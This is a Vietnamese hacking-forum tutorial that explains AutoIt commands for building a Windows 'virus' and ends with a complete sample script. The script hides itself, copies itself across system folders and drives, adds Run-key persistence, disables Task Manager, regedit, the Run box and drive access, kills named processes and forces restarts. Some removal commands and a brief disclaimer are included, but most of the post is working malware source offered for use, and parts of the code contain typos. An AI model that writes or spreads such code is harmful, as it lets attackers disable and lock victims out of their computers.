HACKIS - Hacking Internet Security
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Search
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» Tuyệt Kỹ Đong Giai Chân Kinh (tuyệt Kỹ cua trai)
viết một chương trình virus đơn giản EmptyThu Aug 23, 2012 5:38 am by Admin

» Tuyệt kỹ cua giai
viết một chương trình virus đơn giản EmptyThu Aug 23, 2012 5:36 am by Admin

» NETCAT.........
viết một chương trình virus đơn giản EmptyMon Aug 13, 2012 6:35 am by Admin

» Bảo mật CSDL bằng phương pháp mã hóa.
viết một chương trình virus đơn giản EmptyTue Apr 17, 2012 10:04 pm by Admin

» Hàm mã hóa MD5 bằng JavaScript
viết một chương trình virus đơn giản EmptyTue Apr 17, 2012 10:03 pm by Admin

» Giá của món quà
viết một chương trình virus đơn giản EmptyFri Apr 13, 2012 6:01 am by Admin

» Sẽ chỉ yêu ai?
viết một chương trình virus đơn giản EmptyFri Apr 13, 2012 6:01 am by Admin

» Cách đọc bảng chữ cái!
viết một chương trình virus đơn giản EmptyThu Apr 12, 2012 10:37 pm by Admin

» Gắn trojan, keylog, virus vào website, forum
viết một chương trình virus đơn giản EmptyTue Apr 10, 2012 1:14 am by Admin

Affiliates
free forum


viết một chương trình virus đơn giản

Go down

viết một chương trình virus đơn giản Empty viết một chương trình virus đơn giản

Post  Admin Sun May 22, 2011 10:42 pm

Để viết một chương trình virus đơn giản,đầu tiên các bạn phải down chương trình về tại đây
AutoIt Script Home Page
Link direct: http://www.autoitscript.com/cgi-bin/...t-v3-setup.exe
*Chú ý: +Khi edit 1 một con virus bắt buộc phải nhấn phải chuột rồi nhấn edit script, chứ nếu nhấn chuột trái như bình thường là bạn sẽ tự dính con virus mà bạn làm ra đó
+Không nên kiếm ebook autoit vì nó kô hữu dụng cho bạn đâu, nếu muốn học sâu và rộng hơn thì bạn bắt buộc phải đọc trong file help của chương trình
+Icon của chương trình bắt buộc kô được đẽ mặc định vì các trình virus sẽ phát hiện
+Các lệnh mình sẽ làm nổi lên

Nhưng gì mình viết lên đây chỉ mang tính chất tham khảo.Yêu cầu các bạn không dùng những gì mình viết lên đây để phá người khác

Bắt đầu:

Bước 1: Coppy các code từ hoalong77


Bước 2: Tạo 1 file .au3


Bước 3:Edit scirpt


Bước 4 Paste code vào


Bước 5:Convert file au3 --> exe (cái này quan trọng)


Nếu đây là lần đâu tiên bạn convert file au3 --> exe thì phải làm theo các bước đó, nhưng về sau bạn chỉ cần nhấn phải chột vào file au3 và nhấn compile script là file exe sẽ compile ngay tại thư mục chứa file au3 ^^


Lệnh đầu tiên mà bắt buộc con virus = autoit nào cũng phải có:
#Notrayicon
---> để kô hiện chương trình ở taskbar,có nghĩa là nó sẽ chạy ẩn trong Windown

FileCopy(@ScriptDir & "\***.exe","C:\WINDOWS",1)
---> "***" sẽ là tên virus mà bạn tạo ở con autoit này, lệnh này dùng để kết hợp với lệnh kế tiếp.Lưu ý:Tên virus này bạn sẽ tạo ra lúc biên dich chương trình thành file .exe
Lệnh khắc phục:
FileDelete("C:\Windows\*****.exe")

RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer","REG_SZ",@WindowsDir & "\*****.exe")
---> **** sẽ là tên chương trình, lệnh này dùng để khởi động virus mỗi khi máy tính được bật lên, và chỉ dùng được khi có lệnh ở trên
Lệnh khắc phục:
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer")

RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
----> lệnh này sẽ giúp con virus của bạn khóa taskmanager của máy tính
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr")

RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
----> lệnh này sẽ giúp con virus của bạn khóa regedit của máy tính
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools")

RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoRun","REG_DWORD","1")
----> lệnh này sẽ giúp làm mất nút run trong windows
Lệnh khắc phục:
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoRun")

RegWrite("HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\Windows\CurrentVersion\Explorer\BitBucket","NukeOnDelete","RED_DWORD","1")
----->Lệnh này sẽ làm vô hiệu hoá thùng rác
Lệnh khắc phục:
RegDelete("HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\Windows\CurrentVersion\Explorer\BitBucket","NukeOnDelete")

RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
----> lệnh này giúp bạn khóa ổ đĩa của người khác, kô cho truy cập vào ổ đĩa, "67108863" ---> là thông số để khóa tất cả các ổ đĩa
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive")
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives")


RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoClose","REG_DWORD","1")
---> lệnh này làm mất nút Shutdown ở Start
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoClose")

Lệnh reset máy: Các ban cần lưu ý với các lệnh reset máy vì nó sẽ reset máy của ban liện tục mỗi khi bạn vào Windown
Shutdown(thông số)
Các thông số có thể có là
+0: Đổi user (hay thường gọi là log off)
+1: Tắt máy (shutdown)
+2: reset máy(restart)
+4: Force
+8: Power down
+32: Stanby
+64: Hibernate
VD: Shutdown(2) ---> reset máy

Lệnh đợi, dừng:
Sleep(seconds)
VD: Sleep(3000) ---> Dừng 3 giây

Lệnh kô cho mỡ 1 chương trình bất kỳ (chỉ cần biết tên process của chương trình đó)
$VA = ProcessExists("iexplore.exe")
$RA = ProcessClose("iexplore.exe")
$BU = ProcessExists("winamp.exe")
$BA = ProcessClose("winamp.exe")
While 1
if $VA then $RA
$RA = ProcessClose("iexplore.exe")
if $BU then $BA
$BA = ProcessClose("winamp.exe")

WEnd

----> VD: If ProcessExists("iexplorer.exe") then ---> khi máy tính mở file iexplorer (IE)
ProcessClose("iexplorer.exe") --> đóng ngay lập tức
EndIf
Còn đây la một con virus nhỏ mà mình đã tự viết:

#cs ----------------------------------------------------------------------------


Author: hoalong77

Script Function:
Template AutoIt script.

#ce ----------------------------------------------------------------------------

; Script Start - Add your code below here
#Notrayicon
FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Common Files",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Internet Explorer",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows Media Player",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows Media Player\Sample Playlists",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Internet Explorer\SIGNUP",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS\system32",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS\system",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows NT",1)
FileCopy(@ScriptDir & "\Setup.exe","D:\",1)
FileCopy(@ScriptDir & "\Setup.exe","E:\",1)
FileCopy(@ScriptDir & "\Setup.exe","F:\",1)
FileCopy(@ScriptDir & "\Setup.exe","G:\",1)
FileCopy(@ScriptDir & "\Setup.exe","H:\",1)
FileCopy(@ScriptDir & "\Setup.exe","J:\",1)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer","REG_SZ",@WindowsDir & "\Setup.exe")
While 1
FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Common Files",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Internet Explorer",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows Media Player",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows Media Player\Sample Playlists",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Internet Explorer\SIGNUP",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS\system32",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS\system",1)
FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows NT",1)
FileCopy(@ScriptDir & "\Setup.exe","D:\",1)
FileCopy(@ScriptDir & "\Setup.exe","E:\",1)
FileCopy(@ScriptDir & "\Setup.exe","F:\",1)
FileCopy(@ScriptDir & "\Setup.exe","G:\",1)
FileCopy(@ScriptDir & "\Setup.exe","H:\",1)
FileCopy(@ScriptDir & "\Setup.exe","J:\",1)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer","REG_SZ",@WindowsDir & "\Setup.exe")
WEnd
Sleep(1000)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoRun","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoControlPanel","REG_DWORD","1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoClose","REG_DWORD","1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
RegWrite(" HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer","NoDesktop","RED_DWORD","1")
RegWrite("[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer","Notraycontextmenu","RED_DWORD","1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer","NoFind","RED_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Explorer\ BitBucket","NukeOnDelete","RED_DWORD","1")
RegWrite("HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\CurrentVersion\Policies\NonEnum","{20D04FE0-3AEA-1069-A2D8-08002B30309D}","RED_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\CurrentVersion\Policies\NonEnum","{20D04FE0-3AEA-1069-A2D8-08002B30309D}","RED_DWORD","1")
RegWrite("HKEY_CURRENT_USER\ Control Panel\ Desktop","MinMaxClose","REG_SZ ","0")
RegWrite("HKEY_CURRENT_USER\ Control Panel\ Desktop","MinMaxClose","RED_DWORD ","1")
RegWrite("HKEY_CURRENT_USER\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoStartMenuMorePrograms","RED_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoStartMenuMorePrograms","RED_DWORD","1")
Slepp(1000)
Shutdown(2)
Admin
Admin
Admin

Tổng số bài gửi : 782
Join date : 2009-08-15

https://hackis.forumvi.com

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum